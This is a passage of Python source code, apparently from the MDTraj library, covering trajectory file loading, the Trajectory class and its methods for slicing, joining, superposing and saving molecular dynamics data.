(ext in ['.hoomdxml']): topology = load_hoomdxml(top, **kwargs).topology elif isinstance(top, Trajectory): topology = top.topology elif isinstance(top, Topology): topology = top elif isinstance(top, string_types): raise IOError('The topology is loaded by filename extension, and the ' 'detected "%s" format is not supported. Supported topology ' 'formats include %s and "%s".' % ( ext, ', '.join(['"%s"' % e for e in _TOPOLOGY_EXTS[:-1]]), _TOPOLOGY_EXTS[-1])) else: raise TypeError('A topology is required. You supplied top=%s' % str(top)) return topology def _get_extension(filename): (base, extension) = os.path.splitext(filename) if extension == '.gz': extension2 = os.path.splitext(base)[1] return extension2 + extension return extension ############################################################################## # Utilities ############################################################################## def open(filename, mode='r', force_overwrite=True, **kwargs): """Open a trajectory file-like object This factor function returns an instance of an open file-like object capable of reading/writing the trajectory (depending on 'mode'). It does not actually load the trajectory from disk or write anything. Parameters ---------- filename : str Path to the trajectory file on disk mode : {'r', 'w'} The mode in which to open the file, either 'r' for read or 'w' for write. force_overwrite : bool If opened in write mode, and a file by the name of `filename` already exists on disk, should we overwrite it? Other Parameters ---------------- kwargs : dict Other keyword parameters are passed directly to the file object Returns ------- fileobject : object Open trajectory file, whose type is determined by the filename extension See Also -------- load, ArcTrajectoryFile, BINPOSTrajectoryFile, DCDTrajectoryFile, HDF5TrajectoryFile, LH5TrajectoryFile, MDCRDTrajectoryFile, NetCDFTrajectoryFile, PDBTrajectoryFile, TRRTrajectoryFile, XTCTrajectoryFile """ extension = _get_extension(filename) try: loader = FormatRegistry.fileobjects[extension] except KeyError: raise IOError('Sorry, no loader for filename=%s (extension=%s) ' 'was found. I can only load files with extensions in %s' % (filename, extension, FormatRegistry.fileobjects.keys())) return loader(filename, mode=mode, force_overwrite=force_overwrite, **kwargs) def load_frame(filename, index, top=None, atom_indices=None, **kwargs): """Load a single frame from a trajectory file Parameters ---------- filename : str Path to the trajectory file on disk index : int Load the `index`-th frame from the specified file top : {str, Trajectory, Topology} Most trajectory formats do not contain topology information. Pass in either the path to a RCSB PDB file, a trajectory, or a topology to supply this information. atom_indices : array_like, optional If not none, then read only a subset of the atoms coordinates from the file. These indices are zero-based (not 1 based, as used by the PDB format). Examples -------- >>> import mdtraj as md >>> first_frame = md.load_frame('traj.h5', 0) >>> print first_frame <mdtraj.Trajectory with 1 frames, 22 atoms> See Also -------- load, load_frame Returns ------- trajectory : md.Trajectory The resulting conformation, as an md.Trajectory object containing a single frame. """ extension = _get_extension(filename) try: loader = FormatRegistry.loaders[extension] except KeyError: raise IOError('Sorry, no loader for filename=%s (extension=%s) ' 'was found. I can only load files with extensions in %s' % (filename, extension, FormatRegistry.loaders.keys())) kwargs['atom_indices'] = atom_indices if extension not in _TOPOLOGY_EXTS: kwargs['top'] = top if loader.__name__ not in ['load_dtr']: _assert_files_exist(filename) else: _assert_files_or_dirs_exist(filename) return loader(filename, frame=index, **kwargs) def load(filename_or_filenames, discard_overlapping_frames=False, **kwargs): """Load a trajectory from one or more files on disk. This function dispatches to one of the specialized trajectory loaders based on the extension on the filename. Because different trajectory formats save different information on disk, the specific keyword argument options supported depend on the specific loaded. Parameters ---------- filename_or_filenames : {str, list of strings} Filename or list of filenames containing trajectory files of a single format. discard_overlapping_frames : bool, default=False Look for overlapping frames between the last frame of one filename and the first frame of a subsequent filename and discard them Other Parameters ---------------- top : {str, Trajectory, Topology} Most trajectory formats do not contain topology information. Pass in either the path to a RCSB PDB file, a trajectory, or a topology to supply this information. This option is not required for the .h5, .lh5, and .pdb formats, which already contain topology information. stride : int, default=None Only read every stride-th frame atom_indices : array_like, optional If not none, then read only a subset of the atoms coordinates from the file. This may be slightly slower than the standard read because it requires an extra copy, but will save memory. See Also -------- load_frame, iterload Examples -------- >>> import mdtraj as md >>> traj = md.load('output.xtc', top='topology.pdb') >>> print traj <mdtraj.Trajectory with 500 frames, 423 atoms at 0x110740a90> >>> traj2 = md.load('output.xtc', stride=2, top='topology.pdb') >>> print traj2 <mdtraj.Trajectory with 250 frames, 423 atoms at 0x11136e410> >>> traj3 = md.load_hdf5('output.xtc', atom_indices=[0,1] top='topology.pdb') >>> print traj3 <mdtraj.Trajectory with 500 frames, 2 atoms at 0x18236e4a0> Returns ------- trajectory : md.Trajectory The resulting trajectory, as an md.Trajectory object. """ if "top" in kwargs: # If applicable, pre-loads the topology from PDB for major performance boost. kwargs["top"] = _parse_topology(kwargs["top"]) # grab the extension of the filename if isinstance(filename_or_filenames, string_types): # If a single filename extension = _get_extension(filename_or_filenames) filename = filename_or_filenames else: # If multiple filenames, take the first one. extensions = [_get_extension(f) for f in filename_or_filenames] if len(set(extensions)) == 0: raise ValueError('No trajectories specified. ' 'filename_or_filenames was an empty list') elif len(set(extensions)) > 1: raise TypeError("Each filename must have the same extension. " "Received: %s" % ', '.join(set(extensions))) else: # we know the topology is equal because we sent the same topology # kwarg in. Therefore, we explictly throw away the topology on all # but the first trajectory and use check_topology=False on the join. # Throwing the topology away explictly allows a large number of pdb # files to be read in without using ridiculous amounts of memory. trajectories = [] for (i, f) in enumerate(filename_or_filenames): t = load(f, **kwargs) if i != 0: t.topology = None trajectories.append(t) return trajectories[0].join(trajectories[1:], discard_overlapping_frames=discard_overlapping_frames, check_topology=False) try: #loader = _LoaderRegistry[extension][0] loader = FormatRegistry.loaders[extension] except KeyError: raise IOError('Sorry, no loader for filename=%s (extension=%s) ' 'was found. I can only load files ' 'with extensions in %s' % (filename, extension, FormatRegistry.loaders.keys())) if extension in _TOPOLOGY_EXTS: # this is a little hack that makes calling load() more predictable. since # most of the loaders take a kwargs "top" except for load_hdf5, (since # it saves the topology inside the file), we often end up calling # load_hdf5 via this function with the top kwarg specified. but then # there would be a signature binding error. it's easier just to ignore # it. if 'top' in kwargs: warnings.warn('top= kwarg ignored since file contains topology information') kwargs.pop('top', None) if loader.__name__ not in ['load_dtr']: _assert_files_exist(filename_or_filenames) else: _assert_files_or_dirs_exist(filename_or_filenames) value = loader(filename, **kwargs) return value def iterload(filename, chunk=100, **kwargs): """An iterator over a trajectory from one or more files on disk, in fragments This may be more memory efficient than loading an entire trajectory at once Parameters ---------- filename : str Path to the trajectory file on disk chunk : int Number of frames to load at once from disk per iteration. If 0, load all. Other Parameters ---------------- top : {str, Trajectory, Topology} Most trajectory formats do not contain topology information. Pass in either the path to a RCSB PDB file, a trajectory, or a topology to supply this information. This option is not required for the .h5, .lh5, and .pdb formats, which already contain topology information. stride : int, default=None Only read every stride-th frame. atom_indices : array_like, optional If not none, then read only a subset of the atoms coordinates from the file. This may be slightly slower than the standard read because it requires an extra copy, but will save memory. skip : int, default=0 Skip first n frames. See Also -------- load, load_frame Examples -------- >>> import mdtraj as md >>> for chunk in md.iterload('output.xtc', top='topology.pdb') ... print chunk <mdtraj.Trajectory with 100 frames, 423 atoms at 0x110740a90> <mdtraj.Trajectory with 100 frames, 423 atoms at 0x110740a90> <mdtraj.Trajectory with 100 frames, 423 atoms at 0x110740a90> <mdtraj.Trajectory with 100 frames, 423 atoms at 0x110740a90> <mdtraj.Trajectory with 100 frames, 423 atoms at 0x110740a90> """ stride = kwargs.pop('stride', 1) atom_indices = cast_indices(kwargs.pop('atom_indices', None)) top = kwargs.pop('top', None) skip = kwargs.pop('skip', 0) extension = _get_extension(filename) if extension not in _TOPOLOGY_EXTS: topology = _parse_topology(top) if chunk % stride != 0: raise ValueError('Stride must be a divisor of chunk. stride=%d does not go ' 'evenly into chunk=%d' % (stride, chunk)) if chunk == 0: # If chunk was 0 then we want to avoid filetype-specific code # in case of undefined behavior in various file parsers. # TODO: this will first apply stride, then skip! if extension not in _TOPOLOGY_EXTS: kwargs['top'] = top yield load(filename, **kwargs)[skip:] elif extension in ('.pdb', '.pdb.gz'): # the PDBTrajectortFile class doesn't follow the standard API. Fixing it # to support iterload could be worthwhile, but requires a deep refactor. t = load(filename, stride=stride, atom_indices=atom_indices) for i in range(0, len(t), chunk): yield t[i:i+chunk] else: with (lambda x: open(x, n_atoms=topology.n_atoms) if extension in ('.crd', '.mdcrd') else open(filename))(filename) as f: if skip > 0: f.seek(skip) while True: if extension not in _TOPOLOGY_EXTS: traj = f.read_as_traj(topology, n_frames=chunk*stride, stride=stride, atom_indices=atom_indices, **kwargs) else: traj = f.read_as_traj(n_frames=chunk*stride, stride=stride, atom_indices=atom_indices, **kwargs) if len(traj) == 0: raise StopIteration() yield traj class Trajectory(object): """Container object for a molecular dynamics trajectory A Trajectory represents a collection of one or more molecular structures, generally (but not necessarily) from a molecular dynamics trajectory. The Trajectory stores a number of fields describing the system through time, including the cartesian coordinates of each atoms (``xyz``), the topology of the molecular system (``topology``), and information about the unitcell if appropriate (``unitcell_vectors``, ``unitcell_length``, ``unitcell_angles``). A Trajectory should generally be constructed by loading a file from disk. Trajectories can be loaded from (and saved to) the PDB, XTC, TRR, DCD, binpos, NetCDF or MDTraj HDF5 formats. Trajectory supports fancy indexing, so you can extract one or more frames from a Trajectory as a separate trajectory. For example, to form a trajectory with every other frame, you can slice with ``traj[::2]``. Trajectory uses the nanometer, degree & picosecond unit system. Examples -------- >>> # loading a trajectory >>> import mdtraj as md >>> md.load('trajectory.xtc', top='native.pdb') <mdtraj.Trajectory with 1000 frames, 22 atoms at 0x1058a73d0> >>> # slicing a trajectory >>> t = md.load('trajectory.h5') >>> print(t) <mdtraj.Trajectory with 100 frames, 22 atoms> >>> print(t[::2]) <mdtraj.Trajectory with 50 frames, 22 atoms> >>> # calculating the average distance between two atoms >>> import mdtraj as md >>> import numpy as np >>> t = md.load('trajectory.h5') >>> np.mean(np.sqrt(np.sum((t.xyz[:, 0, :] - t.xyz[:, 21, :])**2, axis=1))) See Also -------- mdtraj.load : High-level function that loads files and returns an ``md.Trajectory`` Attributes ---------- n_frames : int n_atoms : int n_residues : int time : np.ndarray, shape=(n_frames,) timestep : float topology : md.Topology top : md.Topology xyz : np.ndarray, shape=(n_frames, n_atoms, 3) unitcell_vectors : {np.ndarray, shape=(n_frames, 3, 3), None} unitcell_lengths : {np.ndarray, shape=(n_frames, 3), None} unitcell_angles : {np.ndarray, shape=(n_frames, 3), None} """ # this is NOT configurable. if it's set to something else, things will break # (thus why I make it private) _distance_unit = 'nanometers' @property def topology(self): """Topology of the system, describing the organization of atoms into residues, bonds, etc Returns ------- topology : md.Topology The topology object, describing the organization of atoms into residues, bonds, etc """ return self._topology @topology.setter def topology(self, value): "Set the topology of the system, describing the organization of atoms into residues, bonds, etc" # todo: more typechecking self._topology = value @property def n_frames(self): """Number of frames in the trajectory Returns ------- n_frames : int The number of frames in the trajectory """ return self._xyz.shape[0] @property def n_atoms(self): """Number of atoms in the trajectory Returns ------- n_atoms : int The number of atoms in the trajectory """ return self._xyz.shape[1] @property def n_residues(self): """Number of residues (amino acids) in the trajectory Returns ------- n_residues : int The number of residues in the trajectory's topology """ if self.top is None: return 0 return sum([1 for r in self.top.residues]) @property def n_chains(self): """Number of chains in the trajectory Returns ------- n_chains : int The number of chains in the trajectory's topology """ if self.top is None: return 0 return sum([1 for c in self.top.chains]) @property def top(self): """Alias for self.topology, describing the organization of atoms into residues, bonds, etc Returns ------- topology : md.Topology The topology object, describing the organization of atoms into residues, bonds, etc """ return self._topology @top.setter def top(self, value): "Set the topology of the system, describing the organization of atoms into residues, bonds, etc" # todo: more typechecking self._topology = value @property def timestep(self): """Timestep between frames, in picoseconds Returns ------- timestep : float The timestep between frames, in picoseconds. """ if self.n_frames <= 1: raise(ValueError("Cannot calculate timestep if trajectory has one frame.")) return self._time[1] - self._time[0] @property def time(self): """The simulation time corresponding to each frame, in picoseconds Returns ------- time : np.ndarray, shape=(n_frames,) The simulation time corresponding to each frame, in picoseconds """ return self._time @time.setter def time(self, value): "Set the simulation time corresponding to each frame, in picoseconds" if isinstance(value, list): value = np.array(value) if np.isscalar(value) and self.n_frames == 1: value = np.array([value]) elif not value.shape == (self.n_frames,): raise ValueError('Wrong shape. Got %s, should be %s' % (value.shape, (self.n_frames))) self._time = value @property def unitcell_vectors(self): """The vectors that define the shape of the unit cell in each frame Returns ------- vectors : np.ndarray, shape(n_frames, 3, 3) Vectors defining the shape of the unit cell in each frame. The semantics of this array are that the shape of the unit cell in frame ``i`` are given by the three vectors, ``value[i, 0, :]``, ``value[i, 1, :]``, and ``value[i, 2, :]``. """ if self._unitcell_lengths is None or self._unitcell_angles is None: return None v1, v2, v3 = lengths_and_angles_to_box_vectors( self._unitcell_lengths[:, 0], # a self._unitcell_lengths[:, 1], # b self._unitcell_lengths[:, 2], # c self._unitcell_angles[:, 0], # alpha self._unitcell_angles[:, 1], # beta self._unitcell_angles[:, 2], # gamma ) return np.swapaxes(np.dstack((v1, v2, v3)), 1, 2) @unitcell_vectors.setter def unitcell_vectors(self, vectors): """Set the three vectors that define the shape of the unit cell Parameters ---------- vectors : tuple of three arrays, each of shape=(n_frames, 3) The semantics of this array are that the shape of the unit cell in frame ``i`` are given by the three vectors, ``value[i, 0, :]``, ``value[i, 1, :]``, and ``value[i, 2, :]``. """ if vectors is None or np.all(np.abs(vectors) < 1e-15): self._unitcell_lengths = None self._unitcell_angles = None return if not len(vectors) == len(self): raise TypeError('unitcell_vectors must be the same length as ' 'the trajectory. you provided %s' % str(vectors)) v1 = vectors[:, 0, :] v2 = vectors[:, 1, :] v3 = vectors[:, 2, :] a, b, c, alpha, beta, gamma = box_vectors_to_lengths_and_angles(v1, v2, v3) self._unitcell_lengths = np.vstack((a, b, c)).T self._unitcell_angles = np.vstack((alpha, beta, gamma)).T @property def unitcell_volumes(self): """Volumes of unit cell for each frame. Returns ------- volumes : {np.ndarray, shape=(n_frames), None} Volumes of the unit cell in each frame, in nanometers^3, or None if the Trajectory contains no unitcell information. """ if self.unitcell_lengths is not None: return np.array(list(map(np.linalg.det, self.unitcell_vectors))) else: return None @property def unitcell_lengths(self): """Lengths that define the shape of the unit cell in each frame. Returns ------- lengths : {np.ndarray, shape=(n_frames, 3), None} Lengths of the unit cell in each frame, in nanometers, or None if the Trajectory contains no unitcell information. """ return self._unitcell_lengths @property def unitcell_angles(self): """Angles that define the shape of the unit cell in each frame. Returns ------- lengths : np.ndarray, shape=(n_frames, 3) The angles between the three unitcell vectors in each frame, ``alpha``, ``beta``, and ``gamma``. ``alpha' gives the angle between vectors ``b`` and ``c``, ``beta`` gives the angle between vectors ``c`` and ``a``, and ``gamma`` gives the angle between vectors ``a`` and ``b``. The angles are in degrees. """ return self._unitcell_angles @unitcell_lengths.setter def unitcell_lengths(self, value): """Set the lengths that define the shape of the unit cell in each frame Parameters ---------- value : np.ndarray, shape=(n_frames, 3) The distances ``a``, ``b``, and ``c`` that define the shape of the unit cell in each frame, or None """ self._unitcell_lengths = ensure_type(value, np.float32, 2, 'unitcell_lengths', can_be_none=True, shape=(len(self), 3), warn_on_cast=False, add_newaxis_on_deficient_ndim=True) @unitcell_angles.setter def unitcell_angles(self, value): """Set the lengths that define the shape of the unit cell in each frame Parameters ---------- value : np.ndarray, shape=(n_frames, 3) The angles ``alpha``, ``beta`` and ``gamma`` that define the shape of the unit cell in each frame. The angles should be in degrees. """ self._unitcell_angles = ensure_type(value, np.float32, 2, 'unitcell_angles', can_be_none=True, shape=(len(self), 3), warn_on_cast=False, add_newaxis_on_deficient_ndim=True) @property def xyz(self): """Cartesian coordinates of each atom in each simulation frame Returns ------- xyz : np.ndarray, shape=(n_frames, n_atoms, 3) A three dimensional numpy array, with the cartesian coordinates of each atoms in each frame. """ return self._xyz @xyz.setter def xyz(self, value): "Set the cartesian coordinates of each atom in each simulation frame" if self.top is not None: # if we have a topology and its not None shape = (None, self.topology._numAtoms, 3) else: shape = (None, None, 3) value = ensure_type(value, np.float32, 3, 'xyz', shape=shape, warn_on_cast=False, add_newaxis_on_deficient_ndim=True) self._xyz = value self._rmsd_traces = None def _string_summary_basic(self): """Basic summary of traj in string form.""" unitcell_str = 'and unitcells' if self._have_unitcell else 'without unitcells' value = "mdtraj.Trajectory with %d frames, %d atoms, %d residues, %s" % ( self.n_frames, self.n_atoms, self.n_residues, unitcell_str) return value def __len__(self): return self.n_frames def __add__(self, other): "Concatenate two trajectories" return self.join(other) def __str__(self): return "<%s>" % (self._string_summary_basic()) def __repr__(self): return "<%s at 0x%02x>" % (self._string_summary_basic(), id(self)) def __hash__(self): hash_value = hash(self.top) # combine with hashes of arrays hash_value ^= _hash_numpy_array(self._xyz) hash_value ^= _hash_numpy_array(self.time) hash_value ^= _hash_numpy_array(self._unitcell_lengths) hash_value ^= _hash_numpy_array(self._unitcell_angles) return hash_value def __eq__(self, other): return self.__hash__() == other.__hash__() # def describe(self): # """Diagnostic summary statistics on the trajectory""" # # What information do we want to display? # # Goals: easy to figure out if a trajectory is blowing up or contains # # bad data, easy to diagonose other problems. Generally give a # # high-level description of the data in the trajectory. # # Possibly show std. dev. of differnt coordinates in the trajectory # # or maybe its RMSD drift or something? # # Also, check for any NaNs or Infs in the data. Or other common issues # # like that? # # Note that pandas.DataFrame has a describe() method, which gives # # min/max/mean/std.dev./percentiles of each column in a DataFrame. # raise NotImplementedError() def superpose(self, reference, frame=0, atom_indices=None, ref_atom_indices=None, parallel=True): """Superpose each conformation in this trajectory upon a reference Parameters ---------- reference : md.Trajectory Align self to a particular frame in `reference` frame : int The index of the conformation in `reference` to align to. atom_indices : array_like, or None The indices of the atoms to superpose. If not supplied, all atoms will be used. ref_atom_indices : array_like, or None Use these atoms on the reference structure. If not supplied, the same atom indices will be used for this trajectory and the reference one. parallel : bool Use OpenMP to run the superposition in parallel over multiple cores Returns ------- self """ if atom_indices is None: atom_indices = slice(None) if ref_atom_indices is None: ref_atom_indices = atom_indices if not isinstance(ref_atom_indices, slice) and ( len(ref_atom_indices) != len(atom_indices)): raise ValueError("Number of atoms must be consistent!") n_frames = self.xyz.shape[0] self_align_xyz = np.asarray(self.xyz[:, atom_indices, :], order='c') self_displace_xyz = np.asarray(self.xyz, order='c') ref_align_xyz = np.array(reference.xyz[frame, ref_atom_indices, :], copy=True, order='c').reshape(1, -1, 3) offset = np.mean(self_align_xyz, axis=1, dtype=np.float64).reshape(n_frames, 1, 3) self_align_xyz -= offset if self_align_xyz.ctypes.data != self_displace_xyz.ctypes.data: # when atom_indices is None, these two arrays alias the same memory # so we only need to do the centering once self_displace_xyz -= offset ref_offset = ref_align_xyz[0].astype('float64').mean(0) ref_align_xyz[0] -= ref_offset self_g = np.einsum('ijk,ijk->i', self_align_xyz, self_align_xyz) ref_g = np.einsum('ijk,ijk->i', ref_align_xyz , ref_align_xyz) _rmsd.superpose_atom_major( ref_align_xyz, self_align_xyz, ref_g, self_g, self_displace_xyz, 0, parallel=parallel) self_displace_xyz += ref_offset self.xyz = self_displace_xyz return self def join(self, other, check_topology=True, discard_overlapping_frames=False): """Join two trajectories together along the time/frame axis. This method joins trajectories along the time axis, giving a new trajectory of length equal to the sum of the lengths of `self` and `other`. It can also be called by using `self + other` Parameters ---------- other : Trajectory or list of Trajectory One or more trajectories to join with this one. These trajectories are *appended* to the end of this trajectory. check_topology : bool Ensure that the topology of `self` and `other` are identical before joining them. If false, the resulting trajectory will have the topology of `self`. discard_overlapping_frames : bool, optional If True, compare coordinates at trajectory edges to discard overlapping frames. Default: False. See Also -------- stack : join two trajectories along the atom axis """ if isinstance(other, Trajectory): other = [other] if isinstance(other, list): if not all(isinstance(o, Trajectory) for o in other): raise TypeError('You can only join Trajectory instances') if not all(self.n_atoms == o.n_atoms for o in other): raise ValueError('Number of atoms in self (%d) is not equal ' 'to number of atoms in other' % (self.n_atoms)) if check_topology and not all(self.topology == o.topology for o in other): raise ValueError('The topologies of the Trajectories are not the same') if not all(self._have_unitcell == o._have_unitcell for o in other): raise ValueError('Mixing trajectories with and without unitcell') else: raise TypeError('`other` must be a list of Trajectory. You supplied %d' % type(other)) # list containing all of the trajs to merge, including self trajectories = [self] + other if discard_overlapping_frames: for i in range(len(trajectories)-1): # last frame of trajectory i x0 = trajectories[i].xyz[-1] # first frame of trajectory i+1 x1 = trajectories[i + 1].xyz[0] # check that all atoms are within 2e-3 nm # (this is kind of arbitrary) if np.all(np.abs(x1 - x0) < 2e-3): trajectories[i] = trajectories[i][:-1] xyz = np.concatenate([t.xyz for t in trajectories]) time = np.concatenate([t.time for t in trajectories]) angles = lengths = None if self._have_unitcell: angles = np.concatenate([t.unitcell_angles for t in trajectories]) lengths = np.concatenate([t.unitcell_lengths for t in trajectories]) # use this syntax so that if you subclass Trajectory, # the subclass's join() will return an instance of the subclass return self.__class__(xyz, deepcopy(self._topology), time=time, unitcell_lengths=lengths, unitcell_angles=angles) def stack(self, other): """Stack two trajectories along the atom axis This method joins trajectories along the atom axis, giving a new trajectory with a number of atoms equal to the sum of the number of atoms in `self` and `other`. Notes ----- The resulting trajectory will have the unitcell and time information the left operand. Examples -------- >>> t1 = md.load('traj1.h5') >>> t2 = md.load('traj2.h5') >>> # even when t2 contains no unitcell information >>> t2.unitcell_vectors = None >>> stacked = t1.stack(t2) >>> # the stacked trajectory inherits the unitcell information >>> # from the first trajectory >>> np.all(stacked.unitcell_vectors == t1.unitcell_vectors) True Parameters ---------- other : Trajectory The other trajectory to join See Also -------- join : join two trajectories along the time/frame axis. """ if not isinstance(other, Trajectory): raise TypeError('You can only stack two Trajectory instances') if self.n_frames != other.n_frames: raise ValueError('Number of frames in self (%d) is not equal ' 'to number of frames in other (%d)' % (self.n_frames, other.n_frames)) if self.topology is not None: topology = self.topology.join(other.topology) else: topology = None xyz = np.hstack((self.xyz, other.xyz)) return self.__class__(xyz=xyz, topology=topology, unitcell_angles=self.unitcell_angles, unitcell_lengths=self.unitcell_lengths, time=self.time) def __getitem__(self, key): "Get a slice of this trajectory" return self.slice(key) def slice(self, key, copy=True): """Slice trajectory, by extracting one or more frames into a separate object This method can also be called using index bracket notation, i.e `traj[1] == traj.slice(1)` Parameters ---------- key : {int, np.ndarray, slice} The slice to take. Can be either an int, a list of ints, or a slice object. copy : bool, default=True Copy the arrays after slicing. If you set this to false, then if you modify a slice, you'll modify the original array since they point to the same data. """ xyz = self.xyz[key] time = self.time[key] unitcell_lengths, unitcell_angles = None, None if self.unitcell_angles is not None: unitcell_angles = self.unitcell_angles[key] if self.unitcell_lengths is not None: unitcell_lengths = self.unitcell_lengths[key] if copy: xyz = xyz.copy() time = time.copy() topology = deepcopy(self._topology) if self.unitcell_angles is not None: unitcell_angles = unitcell_angles.copy() if self.unitcell_lengths is not None: unitcell_lengths = unitcell_lengths.copy() else: topology = self._topology newtraj = self.__class__( xyz, topology, time, unitcell_lengths=unitcell_lengths, unitcell_angles=unitcell_angles) if self._rmsd_traces is not None: newtraj._rmsd_traces = np.array(self._rmsd_traces[key], ndmin=1, copy=True) return newtraj def __init__(self, xyz, topology, time=None, unitcell_lengths=None, unitcell_angles=None): # install the topology into the object first, so that when setting # the xyz, we can check that it lines up (e.g. n_atoms), with the topology self.topology = topology self.xyz = xyz # _rmsd_traces are the inner product of each centered conformation, # which are required for computing RMSD. Normally these values are # calculated on the fly in the cython code (rmsd/_rmsd.pyx), but # optionally, we enable the use precomputed values which can speed # up the calculation (useful for clustering), but potentially be unsafe # if self._xyz is modified without a corresponding change to # self._rmsd_traces. This array is populated computed by # center_conformations, and no other methods should really touch it. self._rmsd_traces = None # box has no default, it'll just be none normally self.unitcell_lengths = unitcell_lengths self.unitcell_angles = unitcell_angles # time will take the default 1..N self._time_default_to_arange = (time is None) if time is None: time = np.arange(len(self.xyz)) self.time = time if (topology is not None) and (topology._numAtoms != self.n_atoms): raise ValueError("Number of atoms in xyz (%s) and " "in topology (%s) don't match" % (self.n_atoms, topology._numAtoms)) def openmm_positions(self, frame): """OpenMM-compatable positions of a single frame. Examples -------- >>> t = md.load('trajectory.h5') >>> context.setPositions(t.openmm_positions(0)) Parameters ---------- frame : int The index of frame of the trajectory that you wish to extract Returns ------- positions : list The cartesian coordinates of specific trajectory frame, formatted for input to OpenMM """ from simtk.openmm import Vec3 from simtk.unit import nanometer Pos = [] for xyzi in self.xyz[frame]: Pos.append(Vec3(xyzi[0], xyzi[1], xyzi[2])) return Pos * nanometer def openmm_boxes(self, frame): """OpenMM-compatable box vectors of a single frame. Examples -------- >>> t = md.load('trajectory.h5') >>> context.setPeriodicBoxVectors(t.openmm_positions(0)) Parameters ---------- frame : int Return box for this single frame. Returns ------- box : tuple The periodic box vectors for this frame, formatted for input to OpenMM. """ from simtk.openmm import Vec3 from simtk.unit import nanometer vectors = self.unitcell_vectors[frame] if vectors is None: raise ValueError("this trajectory does not contain box size information") v1, v2, v3 = vectors return (Vec3(*v1), Vec3(*v2), Vec3(*v3)) * nanometer @staticmethod # im not really sure if the load function should be just a function or a method on the class # so effectively, lets make it both? def load(filenames, **kwargs): """Load a trajectory from disk Parameters ---------- filenames : {str, [str]} Either a string or list of strings Other Parameters ---------------- As requested by the various load functions -- it depends on the extension """ return load(filenames, **kwargs) def _savers(self): """Return a dictionary mapping extensions to the appropriate format-specific save function""" return {'.xtc': self.save_xtc, '.trr': self.save_trr, '.pdb': self.save_pdb, '.pdb.gz': self.save_pdb, '.dcd': self.save_dcd, '.h5': self.save_hdf5, '.binpos': self.save_binpos, '.nc': self.save_netcdf, '.netcdf': self.save_netcdf, '.ncrst' : self.save_netcdfrst, '.crd': self.save_mdcrd, '.mdcrd': self.save_mdcrd, '.ncdf': self.save_netcdf, '.lh5': self.save_lh5, '.lammpstrj': self.save_lammpstrj, '.xyz': self.save_xyz, '.xyz.gz': self.save_xyz, '.gro': self.save_gro, '.rst7' : self.save_amberrst7, } def save(self, filename, **kwargs): """Save trajectory to disk, in a format determined by the filename extension Parameters ---------- filename : str filesystem path in which to save the trajectory. The extension will be parsed and will control the format. Other Parameters ---------------- lossy : bool For .h5 or .lh5, whether or not to use compression. no_models: bool For .pdb. TODO: Document this? force_overwrite : bool If `filename` already exists, overwrite it. """ # grab the extension of the filename extension = _get_extension(filename) savers = self._savers() try: saver = savers[extension] except KeyError: raise IOError('Sorry, no saver for filename=%s (extension=%s) ' 'was found. I can only save files ' 'with extensions in %s' % (filename, extension, savers.keys())) # run the saver, and return whatever output it gives return saver(filename, **kwargs) def save_hdf5(self, filename, force_overwrite=True): """Save trajectory to MDTraj HDF5 format Parameters ---------- filename : str filesystem path in which to save the trajectory force_overwrite : bool, default=True Overwrite anything that exists at filename, if its already there """ with HDF5TrajectoryFile(filename, 'w', force_overwrite=force_overwrite) as f: f.write(coordinates=in_units_of(self.xyz, Trajectory._distance_unit, f.distance_unit), time=self.time, cell_lengths=in_units_of(self.unitcell_lengths, Trajectory._distance_unit, f.distance_unit), cell_angles=self.unitcell_angles) f.topology = self.topology def save_lammpstrj(self, filename, force_overwrite=True): """Save trajectory to LAMMPS custom dump format Parameters ---------- filename : str filesystem path in which to save the trajectory force_overwrite : bool, default=True Overwrite anything that exists at filename, if its already there """ with LAMMPSTrajectoryFile(filename, 'w', force_overwrite=force_overwrite) as f: f.write(xyz=in_units_of(self.xyz, Trajectory._distance_unit, f.distance_unit), cell_lengths=in_units_of(self.unitcell_lengths, Trajectory._distance_unit, f.distance_unit), cell_angles=self.unitcell_angles) def save_xyz(self, filename, force_overwrite=True): """Save trajectory to .xyz format. Parameters ---------- filename : str filesystem path in which to save the trajectory force_overwrite : bool, default=True Overwrite anything that exists at filename, if its already there """ with XYZTrajectoryFile(filename, 'w', force_overwrite=force_overwrite) as f: f.write(xyz=in_units_of(self.xyz, Trajectory._distance_unit, f.distance_unit), types=[a.name for a in self.top.atoms]) def save_pdb(self, filename, force_overwrite=True, bfactors=None): """Save trajectory to RCSB PDB format Parameters ---------- filename : str filesystem path in which to save the trajectory force_overwrite : bool, default=True Overwrite anything that exists at filename, if its already there bfactors : array_like, default=None, shape=(n_frames, n_atoms) or (n_atoms,) Save bfactors with pdb file. If the array is two dimensional it should contain a bfactor for each atom in each frame of the trajectory. Otherwise, the same bfactor will be saved in each frame. """ self._check_valid_unitcell() if not bfactors is None: if len(np.array(bfactors).shape) == 1: if len(bfactors) != self.n_atoms: raise ValueError("bfactors %s should be shaped as (n_frames, n_atoms) or (n_atoms,)" % str(np.array(bfactors).shape)) bfactors = [bfactors] * self.n_frames else: if np.array(bfactors).shape != (self.n_frames, self.n_atoms): raise ValueError("bfactors %s should be shaped as (n_frames, n_atoms) or (n_atoms,)" % str(np.array(bfactors).shape)) else: bfactors = [None] * self.n_frames with PDBTrajectoryFile(filename, 'w', force_overwrite=force_overwrite) as f: for i in xrange(self.n_frames): if self._have_unitcell: f.write(in_units_of(self._xyz[i], Trajectory._distance_unit, f.distance_unit), self.topology, modelIndex=i, bfactors=bfactors[i], unitcell_lengths=in_units_of(self.unitcell_lengths[i], Trajectory._distance_unit, f.distance_unit), unitcell_angles=self.unitcell_angles[i]) else: f.write(in_units_of(self._xyz[i], Trajectory._distance_unit, f.distance_unit), self.topology, modelIndex=i, bfactors=bfactors[i]) def save_xtc(self, filename, force_overwrite=True): """Save trajectory to Gromacs XTC format Parameters ---------- filename : str filesystem path in which to save the trajectory force_overwrite : bool, default=True Overwrite anything that exists at filename, if its already there """ with XTCTrajectoryFile(filename, 'w', force_overwrite=force_overwrite) as f: f.write(xyz=in_units_of(self.xyz, Trajectory._distance_unit, f.distance_unit), time=self.time, box=in_units_of(self.unitcell_vectors, Trajectory._distance_unit, f.distance_unit)) def save_trr(self, filename, force_overwrite=True): """Save trajectory to Gromacs TRR format Notes ----- Only the xyz coordinates and the time are saved, the velocities and forces in the trr will be zeros Parameters ---------- filename : str filesystem path in which to save the trajectory force_overwrite : bool, default=True Overwrite anything that exists at filename, if its already there """ with TRRTrajectoryFile(filename, 'w', force_overwrite=force_overwrite) as f: f.write(xyz=in_units_of(self.xyz, Trajectory._distance_unit, f.distance_unit), time=self.time, 